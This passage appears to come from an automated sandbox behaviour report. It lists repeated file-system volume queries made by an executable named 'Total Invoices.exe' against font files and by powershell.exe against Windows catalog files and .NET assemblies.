                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
